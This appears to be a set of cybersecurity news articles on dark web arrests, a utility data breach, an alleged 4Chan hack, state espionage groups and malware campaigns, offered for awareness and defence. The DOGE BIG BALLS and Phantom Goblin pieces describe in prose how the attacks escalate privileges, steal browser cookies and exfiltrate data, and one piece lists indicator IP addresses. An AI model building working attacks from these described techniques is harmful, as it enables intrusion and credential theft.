Dark Web News

In an international law enforcement operation, 270 individuals involved in dark web criminal activity have been arrested across ten countries. Coordinated by Europol, the operation, codenamed Operation RapTor, targeted online vendors and buyers dealing in illegal drugs, weapons, counterfeit goods, and other illicit items. This large-scale crackdown sends a strong message to criminals hiding behind the anonymity of the dark web: their digital hiding places are no longer safe. Operation RapTor: A Coordinated International Effort Operation RapTor was led by Europol, with support from law enforcement and intelligence agencies across North America, Europe, South America, and Asia. The arrests followed intelligence gathered from several previously dismantled dark web marketplaces, including Nemesis, Tor2Door, Bohemia, and Kingdom Market. Many of the suspects had carried out thousands of transactions on these platforms, relying on encryption and cryptocurrencies to mask their identities and operations. However, the coordinated efforts of international law enforcement agencies allowed investigators to track and identify them. The arrests were distributed across several countries: United States: 130 arrests Germany: 42 arrests United Kingdom: 37 arrests France: 29 arrests South Korea: 19 arrests Austria & Netherlands: 4 arrests each Brazil: 3 arrests Switzerland & Spain: 1 arrest each Investigations are ongoing, and more arrests may follow as authorities continue to analyze seized data. Massive Seizures Disrupt Dark Web Supply Chains In addition to the arrests, law enforcement officers confiscated a large volume of illegal goods and financial assets. The operation led to the seizure of: Over €184 million in cash and cryptocurrency More than 2 tonnes of illegal drugs, including amphetamines, cocaine, ketamine, opioids, and cannabis Over 180 firearms, along with imitation weapons, tasers, and knives 12,500 counterfeit products, ranging from fake IDs to branded knock-offs Over 4 tonnes of illicit tobacco These seizures have significantly disrupted criminal supply chains that feed the dark web economy, particularly those involved in the sale of illegal drugs and counterfeit goods. Europol’s Role and Strategy Europol played a central role in the operation by analyzing and sharing intelligence collected from previously seized dark web marketplaces. Investigators compiled this data into intelligence packages and distributed them to national authorities through the Joint Cybercrime Action Taskforce (J-CAT), hosted at Europol headquarters. This collaborative approach mirrors the success of Operation SpecTor, conducted in 2023, which resulted in 288 arrests. Together, these efforts highlight a growing ability among law enforcement agencies to work across borders and identify key players in the dark web ecosystem. According to Edvardas Šileris, Head of Europol’s European Cybercrime Centre: “Operation RapTor shows that the dark web is not beyond the reach of law enforcement. Through close cooperation and intelligence sharing, officers across four continents identified and arrested suspects, sending a clear message to those who think they can hide in the shadows.” The Growing Threat of Online Crime As traditional dark web marketplaces face increasing pressure, criminals are shifting their tactics. Law enforcement officials have observed a growing trend toward single-vendor shops—websites operated by individual sellers. These smaller platforms aim to reduce exposure and avoid the risks associated with larger, centralized marketplaces. Illegal drugs remain the top commodity sold on the dark web. However, law enforcement is also tracking a rise in prescription drug trafficking and fraudulent services. These include scam websites offering fake hitmen, forged documents, or non-existent goods to exploit unsuspecting buyers. This shift highlights the evolving nature of cybercrime. As criminals adopt new methods to avoid detection, law enforcement must adapt and innovate accordingly. Cooperation Is Key The success of Operation RapTor was made possible through cooperation between multiple international agencies, including: Austria: Criminal Intelligence Service and Provincial Criminal Police Departments Brazil: Civil Police of the States of Pará and São Paulo France: Customs and National Gendarmerie Germany: Federal Criminal Police, Prosecutor’s Office in Cologne, and German Customs Netherlands: Team High Tech Crime and other national units Spain: National Police South Korea: Darknet Investigations Unit of the Seoul Central District Prosecutors’ Office Switzerland: Zurich Cantonal Police and Public Prosecutor’s Office United Kingdom: National Crime Agency and Police Chiefs’ Council United States: Department of Justice and a host of federal agencies, including the FBI, DEA, HSI, IRS, ATF, CBP, NCIS, and more Strengthening Law Enforcement Magnus Brunner, European Commissioner for Internal Affairs and Migration, emphasized the importance of continued investment in law enforcement capabilities: “This operation is proof of how criminal gangs operate today: offline and online, internationally and locally, using technology to their full advantage. To counter this, coordinated action is essential. And that is exactly the added value Europol provides.” He added that the European Union is working on ProtectEU, an Internal Security Strategy designed to make law enforcement future-proof. Part of this effort includes increasing funding and expanding the mandate of Europol to respond more effectively to emerging digital threats. A Clear Message to Criminals The success of Operation RapTor sends a strong and clear message: the dark web is no longer a safe haven for criminals. While the internet provides tools that criminals can use to hide, it also offers opportunities for law enforcement to track and catch them. Through advanced investigative techniques, cross-border cooperation, and the intelligent use of data, law enforcement agencies around the world are proving that even in the darkest corners of the internet, justice can still reach.

Nova Scotia’s largest electric utility, Nova Scotia Power, has confirmed that customer information was stolen in a recent cyberattack that compromised parts of its IT systems. The company, along with its Halifax-based parent firm Emera, discovered the Nova Scotia Power data breach on April 25, 2025, prompting immediate action to isolate and secure the affected servers. In an official update shared on Wednesday, Nova Scotia Power revealed that the cyber incident had resulted in unauthorized access to sensitive customer information. According to their investigation, the Nova Scotia Power cyberattack occurred on or around March 19, 2025, nearly five weeks before it was detected. Nova Scotia Power Data Breach: Investigation and Response Underway Nova Scotia Power stated it is working closely with external cybersecurity experts to assess the extent of the data breach and to restore and rebuild impacted systems. “We are continuing to investigate the cyber incident that has affected certain IT systems in our network,” the company said in its public communication. “Our priority is to safely and securely restore operations while protecting customer information.” Though the investigation is still ongoing, Nova Scotia Power has confirmed that an unauthorized third party accessed and stole certain customer data from the affected servers. Physical operations—such as power generation, distribution, and transmission—were not impacted, and customers are still receiving uninterrupted electric service. Types of Data Compromised The stolen information varies by individual and is based on what each customer had previously provided to the company. The affected data may include: Full name Phone number Email address Mailing and service addresses Participation in Nova Scotia Power programs Date of birth Customer account history (including power consumption, service requests, payment and billing records, credit history, and past customer support communication) Driver’s license number Social Insurance Number (SIN) Bank account numbers (for those enrolled in pre-authorized payments) While there is currently no evidence that the stolen information has been misused, the company is urging customers to remain alert for potential fraud or scams that may follow. Support for Affected Customers To support impacted individuals, Nova Scotia Power is offering a free two-year subscription to TransUnion’s myTrueIdentity® credit monitoring service. Affected customers will receive notification letters by mail with details about what information was exposed and how to activate the complimentary monitoring service. “If you receive a letter from us, it will contain a dedicated phone number you can call to ask questions and enroll in the credit monitoring service,” the company said in its announcement. This service is intended to help individuals detect any suspicious activity tied to their identity or financial information. Increase in Fraud Attempts Since the incident, Nova Scotia Power has noticed a surge in fraudulent messages and phishing attempts that appear to come from the utility company. These include fake emails, text messages, social media posts, and websites impersonating Nova Scotia Power. On its official website and social media, the company has issued a clear warning: “Due to the recent cyber incident, there has been an increase in fraudulent communications posing as Nova Scotia Power. Please remain cautious of any unsolicited messages asking for your personal information. Do not click on links or download attachments from unverified sources.” The company advises customers to confirm any suspicious communication by contacting their Customer Care Centre directly through verified contact details listed on their official website. Source: Nova Scotia Power Official Website Social Media Update Nova Scotia Power also used its official X (formerly Twitter) account to share updates. A thread posted on Wednesday reiterated the company’s apology and reassured customers that every effort is being made to protect their privacy. “We sincerely apologize that this has occurred. Protecting the privacy and security of the information we hold is of the utmost importance to every member of our team,” the company stated. “Starting today, notifications will be sent to impacted individuals via mail. While we have no evidence of misuse of personal information, we have arranged for a two-year subscription to TransUnion’s myTrueIdentity® credit monitoring service at no cost.” Source: X As part of its ongoing efforts, Nova Scotia Power’s IT team is working around the clock with external cybersecurity specialists to rebuild affected systems, improve security measures, and prevent future incidents. The utility emphasized that safeguarding customer data remains a top priority. It encourages customers to practice good cyber hygiene by: Verifying the source of any unexpected communication Not sharing personal information over phone, text, or email unless certain of the recipient’s identity Monitoring financial accounts for unusual activity Activating the provided credit monitoring service if notified What You Should Do If you are a Nova Scotia Power customer and suspect your information may be involved: Watch for a mailed letter from the company with detailed instructions. Enroll in the free two-year credit monitoring service offered through TransUnion. Report any suspicious communications claiming to be from Nova Scotia Power. Contact Nova Scotia Power’s Customer Care Centre if you are unsure about the authenticity of a message. While physical infrastructure was unaffected in Nova Scotia Power cyberattack, the exposure of personal customer data reveals how critical IT security has become in the utility sector. As investigations continue, this cyberattack on Nova Scotia Power highlights the urgent need for stronger data protection practices, real-time dark web monitoring, and faster breach detection.

On April 14, 2025, 4Chan, the infamous anonymous image board, experienced downtime due to unexplained outages that left users frustrated and speculating about the cause. While the exact reason for the downtime remains uncertain, some users have suggested that a cyberattack or hacking incident could be responsible.   According to DownDetector, a service that monitors website disruptions, a surge in user reports highlighted the problems with 4Chan. The issues were largely related to the website itself (72%), server connections (24%), and posting (4%). These reports spiked around 10 p.m. on April 14 and continued into the next day, with many users complaining that 4Chan was intermittently down for hours.  4Chan Hacking and Leaked Data Raise Concerns  Downdetector showing outage data for 4Chan (Source: Downdetector) As the outage continued, several screenshots allegedly showing 4Chan’s backend surfaced on social media. These images appeared to display source code, templates for banning users, and a list of moderators and “janitors”—users with limited administrative rights.   The leaked data even included personal information like email addresses tied to 4Chan moderators, sparking further suspicion that the site had been hacked. These leaks appeared to coincide with the downtime, leading to increased speculation about a potential cyberattack on 4Chan.  4Chan’s Controversial History with Cyberattacks  4Chan has long been associated with controversy and cyberattacks. The platform, which offers complete anonymity for users to post images and text, has repeatedly been the subject of boycotts, both from users and advertisers, as well as accusations that it hosts hate speech and illegal content. It has even been linked to inspiring mass shootings and other violent events.   Additionally, users on 4Chan have been involved in planning cyberattacks, including Distributed Denial-of-Service (DDoS) campaigns. On top of that, 4Chan has been home to the propagation of conspiracy theories, some of which have led to real-world consequences, such as the January 6 insurrection at the U.S. Capitol.  Given its reputation, the recent downtime and the potential cyberattack on 4Chan have fueled further rumors about the platform’s vulnerability. Some users have speculated that the site was breached, while others believe it could be a result of long-standing software vulnerabilities that 4Chan has yet to address.  Alleged Hack and Doxxing  The rumors surrounding the potential cyberattack gained traction after a previously banned 4Chan board briefly reappeared online, followed by a defacing message that read, “U GOT HACKED XD.” Shortly thereafter, an online account on a rival forum, Soyjak.party, posted screenshots allegedly revealing parts of 4Chan’s backend systems, including usernames and email addresses of 4Chan’s administrators and moderators. These leaks quickly escalated into a wave of doxxing, where users shared personal details of the 4Chan staff, including photos and other private information.  Though the validity of these claims remains unclear, TechCrunch reported that one 4Chan moderator believed the leak and cyberattack were genuine. Despite multiple attempts, WIRED could not reach 4Chan for an official statement, further deepening the uncertainty surrounding the incident.  Conclusion   The recent alleged cyberattack on 4Chan highlights the platform’s ongoing struggles with outdated software, security vulnerabilities, and its controversial reputation. Despite previous reassurances from the site’s founder, Christopher Poole, regarding security improvements, it appears that 4Chan’s legacy of hosting questionable content and attracting extremist users has left it susceptible to breaches.   Over the years, the platform’s transformation from a niche space for anime fans to a hub for more nefarious activities has only deepened its notoriety. While the exact cause of the recent attack remains unclear, it is evident that 4Chan continues to face security challenges, not just in terms of securing its infrastructure but also in managing its reputation.

Cyble researchers have uncovered ransomware called DOGE BIG BALLS, a ransomware that not just stands out but also presents its technical prowess for audacious psychological manipulation.  This malware campaign intricately weaves together advanced exploitation techniques, social engineering, and a deliberate attempt to misattribute blame, notably linking itself to Edward Coristine, a 19-year-old software engineer associated with Elon Musk’s DOGE initiative. The Genesis of the DOGE BIG BALLS Attack: A Deceptive ZIP File  DOGE BIG Infection Chain (Source: Cyble) The attack begins with a seemingly innocuous ZIP file titled “Pay Adjustment.zip,” typically disseminated through phishing emails. Inside, a shortcut file named “Pay Adjustment.pdf.lnk” awaits unsuspecting victims. Contents of LNK file (Source: Cyble) Upon activation, this shortcut silently executes a series of PowerShell commands that initiate a multi-stage infection process.  The first script, stage1.ps1, checks for administrative privileges. If detected, it proceeds to download and execute a modified version of Fog ransomware, masquerading as “Adobe Acrobat.exe” within a hidden folder in the system’s startup directory. Doge Big Balls Ransomware Prompt (Source: Cyble) This stealthy placement ensures that the ransomware runs with elevated privileges, bypassing standard security measures.  Exploiting Kernel Vulnerabilities: The CVE-2015-2291 Flaw  A pivotal aspect of this attack is the exploitation of CVE-2015-2291, a vulnerability in Intel’s Ethernet diagnostics driver (iqvw64e.sys). This flaw allows attackers to execute arbitrary code with kernel-level privileges through specially crafted IOCTL calls. By leveraging this vulnerability, the attackers can escalate their privileges, disable security logging, and maintain persistence within the compromised system. The malicious tool ktool.exe is responsible for this exploitation. It installs the vulnerable driver as a kernel-mode service, granting the ransomware process direct access to kernel memory. This access facilitates the injection of the SYSTEM process token into the ransomware, effectively elevating its privileges and enabling it to disable security mechanisms.  Psychological Manipulation: The “DOGE BIG BALLS” Branding  The ransomware’s name, “DOGE BIG BALLS,” is a deliberate attempt to associate the attack with Edward Coristine and the DOGE initiative. Coristine is a prominent figure in the tech community, known for his involvement with Elon Musk’s Department of Government Efficiency (DOGE). By incorporating his name and the DOGE reference, the attackers aim to create confusion and misdirect any investigations.  The ransom note further compounds this misdirection by including Coristine’s personal details, such as his home address and phone number. Chat window (Source: Cyble) This tactic serves to intimidate the victim and divert attention from the true perpetrators.  Advanced Reconnaissance and Geolocation Techniques  Beyond encryption, the attackers employ new methods to gather intelligence about their victims. The lootsubmit.ps1 script collects extensive system and network information, including hardware IDs, firewall states, network configurations, and running processes. This data is transmitted to the attackers via a cloud hosting platform, aiding in further profiling and potential future attacks.  Notably, the attackers utilize the Wigle.net API to determine the victim’s physical location. By querying the MAC address of the victim’s router (BSSID), they can pinpoint the exact geographic location, offering more precise geolocation than traditional IP-based methods.  The Role of Havoc C2 Beacon in Post-Exploitation  Embedded within the attack is a Havoc C2 beacon (demon.x64.dll), indicating the attackers’ potential to maintain long-term access or conduct additional post-encryption activities. This beacon facilitates communication with the attacker’s command and control infrastructure, enabling them to issue further instructions or exfiltrate additional data from the compromised system.  The Involvement of Edward Coristine: A Case of Misattribution  Edward Coristine’s name appears prominently in the ransom note, accompanied by his personal contact information. This inclusion is a strategic move by the attackers to mislead investigators and the public into believing that Coristine is responsible for the attack. In reality, Coristine has no involvement in this cybercrime. The use of his name is a calculated attempt to exploit his association with the DOGE initiative and create a false narrative.  Coristine’s involvement with DOGE, a project aimed at promoting efficiency and transparency in government operations, has made him a recognizable figure in the tech community. By associating his name with the ransomware, the attackers seek to capitalize on his public profile to lend credibility to their demands and confuse potential investigators. Conclusion   To fight against DOGE BIG BALLS ransomware attacks, which skillfully combine technical prowess, psychological manipulation, and strategic misdirection—including the false attribution to Edward Coristine—organizations and individuals must adopt a proactive and layered defense strategy.   Effective mitigation begins with enforcing strict execution policies to block untrusted LNK files and PowerShell scripts, while consistently monitoring PowerShell activity for anomalies. Deploying advanced Endpoint Detection and Response (EDR) solutions capable of identifying fileless malware and suspicious behavior is essential. Limiting administrative privileges through Role-Based Access Control (RBAC) and monitoring for privilege escalation attempts can further reduce exposure. Additionally, blocking unauthorized outbound connections to services like Netlify and external APIs such as Wigle.net is crucial for preventing data exfiltration and geolocation tracking. 

The Government Computer Emergency Response Team (CERT-UA) issued an important warning about a series of targeted cyberattacks aimed at employees within Ukraine’s defense-industrial complex and members of the Armed Forces. These attacks have been tracked under the identifier UAC-0200, marking a concerning escalation in espionage activities leveraging the DarkCrystal RAT (DCRAT). According to CERT-UA, the attacks, which have been ongoing since at least the summer of 2024, employ sophisticated tactics to gain unauthorized access to sensitive information. One of the primary techniques identified involves the use of the Signal messaging app, where malicious actors have been spreading messages disguised as meeting reports.  Also Read: UAC-0173 Resumes Cyberattacks Against Ukrainian Notary Offices Using DARKCRYSTALRAT Malware These deceptive messages often contain compressed archive files, which include a PDF document and an executable file, classified as DarkTortilla. The DarkTortilla file serves as a cryptor/loader designed to decrypt and launch the DarkCrystal RAT (DCRAT) on the infected system. How the DarkCrystal RAT Works DarkCrystal RAT (DCRAT) is a powerful remote access tool that allows cybercriminals to control infected systems from a distance. Once installed, it grants the attackers complete control over the victim’s device, enabling them to exfiltrate sensitive information, manipulate data, and even deploy additional malicious payloads. The use of DarkTortilla as a loader is particularly concerning as it hides the malicious intent behind a seemingly innocuous file, making it more difficult for users to detect.  The CERT-UA team further emphasized that starting in February 2025, the focus of these attacks shifted toward topics related to unmanned aerial vehicles (UAVs) and electronic warfare systems. This shift suggests that the attackers are now targeting more specific defense technologies, likely to gather intelligence on Ukraine’s military capabilities. Leveraging Social Engineering Tactics for Cyberattacks  One of the key features of these cyberattacks is the use of social engineering techniques to manipulate victims into opening malicious attachments. The use of Signal, a popular messaging platform, broadens the attack surface, providing cybercriminals with a relatively unregulated channel through which to spread their payloads. Messages often appear to come from trusted sources, such as colleagues or business partners, whose accounts have already been compromised. This method of attack makes it harder for traditional security systems to detect and block malicious activity, as the attackers exploit legitimate communication channels to deliver their payloads. CERT-UA’s Ongoing Monitoring and Response  The CERT-UA team has been closely monitoring these threats, and they urge all individuals working in the defense sector to remain vigilant. In the event of receiving suspicious messages or files, CERT-UA encourages immediate reporting to the authorities through all available means.  As part of its ongoing efforts, CERT-UA has released a list of indicators of compromise (IOCs) to help organizations identify and respond to the threat. These IOCs include specific file hashes and network addresses associated with the attack.   The listed files include archive files such as “Звіт 10.03.25.rar” and “Наказ 17.02.2025.pdf,” which contain the malicious executables linked to the DarkCrystal RAT.  The identified network addresses linked to the attacks include:  45[.]130.214.237  62[.]60.235.190  87[.]249.50.64  217[.]25.91.61  83[.]147.253.138  Additionally, there are several URLs associated with the compromised network infrastructure, which are used to facilitate the attack and maintain communication between the infected systems and the attackers’ servers.  The UAC-0200 attack campaign highlights the growing cybersecurity risks faced by Ukraine’s defense sector. The use of sophisticated malware like DarkCrystal RAT (DCRAT) highlights the need for stronger security, especially against social engineering tactics that exploit communication tools such as Signal. As cybercriminals become more advanced, constant vigilance and proactive cybersecurity measures are essential.  CERT-UA’s ongoing monitoring plays a crucial role in managing these threats, but individuals must also stay alert and report suspicious activity. With cyberattacks becoming more advanced, it’s vital for both government and private sectors to collaborate in strengthening defenses to protect Ukraine’s defense infrastructure and national security. 

The Chinese espionage group known as Silk Typhoon has expanded the cyberattacks to target the global IT supply chain. Microsoft Threat Intelligence has identified a shift in the group’s tactics, highlighting a new focus on commonly used IT solutions such as remote management tools and cloud applications. The group’s strategic aim is to gain initial access to victim organizations, allowing them to further infiltrate networks and perform sophisticated espionage operations.  Since 2020, Silk Typhoon has become one of the most formidable Chinese state-backed threat actors. Their activities demonstrate a high level of resourcefulness and technical expertise, allowing them to exploit vulnerabilities rapidly. Their threat intelligence tactics are centered around discovering and leveraging zero-day vulnerabilities in information technology infrastructures, particularly public-facing devices that remain unpatched. Their swift operational tempo and opportunistic approach make them one of the most active and dangerous cyber espionage groups in the world.  While Microsoft has not yet observed Silk Typhoon targeting their cloud services directly, the group exploits unpatched software applications to elevate their access and extend their reach across organizational networks. Once a victim is compromised, the group gains access to sensitive information and tools, using stolen credentials to abuse applications—some of which include Microsoft services—to meet their espionage objectives.  Silk Typhoon Targets a Wide Range of Sectors  The scope of Silk Typhoon’s attacks is expansive, targeting a variety of sectors, including information technology, defense, government, healthcare, energy, legal services, education, and non-governmental organizations (NGOs) across the globe. These attacks are not confined to any specific region, as Silk Typhoon has been observed targeting organizations in both the United States and internationally. Their activity suggests that the group is especially interested in sectors that hold sensitive data or play a critical role in global infrastructure.  Their sophisticated understanding of cloud environments allows them to move laterally through victim networks with ease. This capability helps the group maintain persistence, escalate privileges, and exfiltrate valuable data rapidly. Microsoft Threat Intelligence has tracked the activities of Silk Typhoon since 2020, providing crucial insights into the group’s operational methods, which include using web shells to execute commands and persistently maintain access in compromised environments. Compromise of IT Supply Chains  Recent research from Microsoft Threat Intelligence, which began tracking Silk Typhoon in late 2024, reveals new tactics employed by the group. One of the most interesting changes has been the group’s compromise of the IT supply chain, using stolen API keys and credentials to gain access to third-party service providers. These compromises have given Silk Typhoon a foothold into downstream customer environments. In particular, they have targeted sectors such as privileged access management (PAM), cloud app providers, and cloud data management companies. Once they gain access through these API keys, Silk Typhoon performs reconnaissance on victim devices and harvests valuable data. The group has specifically shown interest in information related to U.S. government policy, law enforcement investigations, and legal processes that are of strategic value to China’s geopolitical interests. Other methods employed by Silk Typhoon during their post-compromise activities include resetting admin accounts, implanting web shells, creating new users, and clearing system logs to hide their tracks.  Password Spray and Abuse  In addition to exploiting software vulnerabilities, Silk Typhoon has demonstrated proficiency in abusing weak password practices to gain access. The group has used password spray attacks, where attackers try commonly used passwords across many accounts, and other password abuse techniques. Silk Typhoon has also been observed conducting reconnaissance using publicly available data, such as leaked corporate passwords found on repositories like GitHub. The exploitation of these vulnerabilities often serves as the first step in Silk Typhoon’s attack chain, granting them initial access to victim environments. Once inside, they proceed with lateral movement tactics, utilizing compromised credentials and stealing data across both on-premises and cloud systems. Notably, Silk Typhoon has been observed targeting Microsoft AADConnect servers, which synchronize on-premises Active Directory with Azure Active Directory (AAD), allowing them to escalate privileges and move between environments.  Cloud Environments and Data Exfiltration  A key aspect of Silk Typhoon’s operations involves infiltrating cloud environments. Once the group has compromised an on-premises environment, they escalate their access to cloud environments by targeting service principals and OAuth applications with administrative permissions. This access enables them to steal email data via MSGraph API, and, in some cases, compromise Exchange Web Services (EWS) to steal email data.  In some cases, Silk Typhoon has been seen creating Entra ID applications designed to mimic legitimate services within the environment, such as Office 365. These efforts are part of their broader strategy to exfiltrate data, move across different tenants, and conduct further espionage activities without detection.  Conclusion  Silk Typhoon’s reliance on covert networks, such as the CovertNetwork, which includes compromised devices like Cyberoam appliances, Zyxel routers, and QNAP devices, enables them to obfuscate their activities and maintain a low profile while exfiltrating data from victim environments. As nations and organizations increasingly depend on cloud technologies and complex IT infrastructures, Silk Typhoon’s ability to exploit these systems highlights the need for better cybersecurity defenses.

A new malware campaign named Phantom Goblin, identified and analyzed by Cyble, uses information-stealing malware that uses social engineering techniques to deceive victims and steal sensitive data, including browser credentials and cookies.  The campaign is notable for its use of trusted tools and services like PowerShell and Visual Studio Code (VSCode), which help it evade traditional security mechanisms and establish covert, persistent remote access.  Key Insights into Phantom Goblin  Phantom Goblin Infection Chain (Source: Cyble) Phantom Goblin primarily targets browsers and developer tools, leveraging social engineering and malicious scripts to install and operate undetected. According to Cyble Research and Intelligence Labs (CRIL), The malware works by tricking users into executing a disguised LNK file, which then triggers a series of payloads designed to extract and exfiltrate sensitive data.  Social Engineering and Initial Infection: The malware distribution typically begins with a deceptive RAR archive that contains a malicious LNK file. The file is cleverly named to resemble a legitimate document, such as a PDF, prompting users to click on it. When executed, the LNK file runs a PowerShell script, which silently downloads additional payloads from a GitHub repository. This script also ensures persistence by adding itself to the Windows registry, allowing the malware to run each time the system restarts. Exploitation of Browser Vulnerabilities: Once installed, Phantom Goblin turns its attention to web browsers, seeking to extract cookies and login credentials. To do so, it uses a technique that bypasses Chrome’s App Bound Encryption (ABE), enabling it to collect browser data without triggering user alerts. By forcefully terminating active browser processes, the malware ensures that cookie files can be accessed and stolen without any interference. Use of Visual Studio Code (VSCode) Tunnels One of the standout features of Phantom Goblin is its ability to establish unauthorized remote access to infected systems. The malware achieves this by deploying a malicious binary named “vscode.exe,” which creates a Visual Studio Code tunnel on the compromised machine. This allows the attackers to control the system remotely while bypassing traditional security mechanisms.  Stealthy Exfiltration via Telegram Phantom Goblin’s data exfiltration process is another key component of its covert operation. Using Telegram’s bot API, the malware can send stolen information, including cookies, credentials, and browsing history, to a remote Telegram channel. This technique helps ensure that the stolen data is sent securely and without detection, even as the malware continues to operate on the compromised machine.  Persistence and Evasion Tactics The attackers behind Phantom Goblin take great care to ensure the malware remains undetected and persists on infected systems. The malware’s payloads are designed to appear as legitimate software, such as “updater.exe” or “browser.exe,” which further complicates detection by traditional security tools. The use of trusted services like GitHub and PowerShell for downloading additional payloads makes it harder for antivirus software to identify malicious activity. Infection Chain and Malicious Payloads  Malicious LNK File (Source: Cyble) The infection process begins with the delivery of an email containing a RAR attachment, which houses the malicious LNK file. Upon execution, the LNK file triggers the PowerShell script that downloads and runs additional payloads. Among these payloads are: Updater.exe: This component focuses on stealing cookies from popular browsers like Chrome, Edge, and Brave. It achieves this by terminating the browser processes and enabling remote debugging to bypass security measures like App Bound Encryption (ABE). Once the cookies are extracted, they are archived and sent to the attacker’s Telegram bot.  Vscode.exe: This binary is responsible for establishing a VSCode tunnel, allowing the attackers to remotely access the infected system. The malware manipulates VSCode’s legitimate update process to maintain a cover, ensuring that it can establish a hidden backdoor into the victim’s machine.  Browser.exe: This payload gathers a variety of sensitive information, including browsing history, login credentials, and session data. By targeting a wide range of browsers, it ensures that a broad swath of personal data is collected from the victim’s system.  Defense Against Phantom Goblin  To protect systems from Phantom Goblin and similar threats, experts recommend several best practices:  Email Filtering: Implement advanced filtering techniques to block suspicious attachments, particularly those in RAR, ZIP, or LNK formats. Scanning all attachments with up-to-date antivirus software before opening them is crucial.  Disabling VSCode Tunnels: Restrict the use of Visual Studio Code tunneling for unauthorized users by enforcing access controls and authentication mechanisms. Limiting the ability to run VSCode on sensitive systems can help prevent remote access.  PowerShell Restrictions: Disable or restrict the use of PowerShell and script execution on systems unless absolutely necessary. Monitoring for suspicious PowerShell activity, such as the execution of scripts from external repositories, can help detect and block malicious actions.  Browser Security: Implement strong browser security measures to prevent unauthorized debugging and to restrict access to sensitive data stored within browsers. Enforcing multi-factor authentication (MFA) and session timeouts can help further protect browser-based credentials.  Endpoint Protection: Deploy endpoint protection solutions that include real-time threat detection for malicious processes, registry changes, and unusual file downloads.  Conclusion  Phantom Goblin highlights how cybercriminals use social engineering and trusted tools to bypass security measures and steal sensitive data. By exploiting vulnerabilities in browsers and developer tools, and leveraging remote access through Visual Studio Code tunnels, the attackers remain undetected and persistent. Cyble’s cutting-edge products and solutions, including Cyble Vision and Cyble Hawk, provide AI-driven threat intelligence and proactive security measures to help organizations detect, prevent, and respond to cyber threats, ensuring better defense against attacks like Phantom Goblin.

The U.S. Department of the Treasury has imposed sanctions on Iranian national Behrouz Parsarad, the sole administrator of Nemesis, a darknet marketplace that facilitated the sale of illegal drugs, hacking services, and false identification documents. This action follows the marketplace’s takedown in a global law enforcement operation in 2024. A Darknet Marketplace for Crime Nemesis, founded in 2021, was a criminal enterprise with over 30,000 active users and 1,000 vendors. According to U.S. officials, the marketplace facilitated transactions worth nearly $30 million, including fentanyl sales in the United States and abroad. Designed with built-in money laundering features, darknet provided a safe haven for cybercriminals and drug traffickers. “As the administrator of the Nemesis darknet marketplace, Parsarad sought to build—and continues to try to re-establish—a safe haven to facilitate the production, sale, and shipment of illegal narcotics like fentanyl and other synthetic opioids,” stated Acting Under Secretary for Terrorism and Financial Intelligence Bradley T. Smith. “Treasury, in partnership with U.S. law enforcement, will use all available tools to dismantle these darknet marketplaces and hold accountable the individuals who oversee them.” Darknet allowed criminals to sell fentanyl, often laced with other substances and provided professional hacking services that enabled buyers to take control of victims’ online accounts. The marketplace’s encrypted nature allowed users to operate anonymously, making it a major player in global cybercrime. International Crackdown and Sanctions In March 2024, U.S., German, and Lithuanian law enforcement agencies coordinated a joint operation to seize Nemesis’ servers, effectively shutting down the marketplace. However, authorities report that Parsarad has been actively trying to rebuild a similar platform and has been in contact with former vendors. OFAC’s action marks its first designation as a member of the FBI-led Joint Criminal Opioid and Darknet Enforcement (JCODE) Team. The designation was made under Executive Order (E.O.) 14059, which targets individuals and entities contributing to the proliferation of narcotics. OFAC’s move aligns with previous actions against other illicit marketplaces, including the shutdown of Genesis Market in 2023 and Hydra Market in 2022. Financial Networks Under Scrutiny In addition to sanctioning Parsarad, OFAC has identified 49 virtual currency addresses linked to his financial activities. These addresses were allegedly used to launder funds for narcotics traffickers and cybercriminals, generating millions of dollars in illicit revenue. Treasury officials emphasized that darknet marketplaces are crucial to the global drug trade. A recent Financial Crimes Enforcement Network (FinCEN) advisory, published on June 20, 2024, highlighted how criminal organizations use these platforms to distribute precursor chemicals and synthetic opioids, worsening the fentanyl crisis in the United States. Nemesis Marketplace: Implications of the Sanctions The sanctions against Parsarad have significant consequences. All property and interests linked to him within the United States or under U.S. control are now blocked. Additionally, entities that are at least 50% owned by Parsarad are also subject to these restrictions. Financial institutions and individuals engaging with the sanctioned entity may face severe penalties. Under U.S. law, transactions involving designated persons are generally prohibited unless authorized by OFAC. This includes providing financial assistance, goods, or services to Parsarad or entities under his control. Violations of these sanctions could lead to civil or criminal penalties, with OFAC emphasizing strict enforcement. The Treasury Department warned that non-U.S. individuals and businesses must also comply with these restrictions to avoid potential repercussions. A Step Forward in Stopping Darknet Crime The action against Parsarad and Nemesis follows a broader effort to stop cyber-enabled crime and narcotics trafficking worldwide. By targeting the financial infrastructure behind these illicit platforms, law enforcement agencies aim to curb the reach of cybercriminals and drug traffickers. While Parsarad may attempt to rebuild, authorities have signaled their resolve to track and dismantle such operations. With darknet marketplaces playing a critical role in global cybercrime, Treasury officials stress that coordinated international action remains essential. As the fight against online crime continues, the sanctions against Parsarad mark another significant step in securing the digital landscape from illicit activities.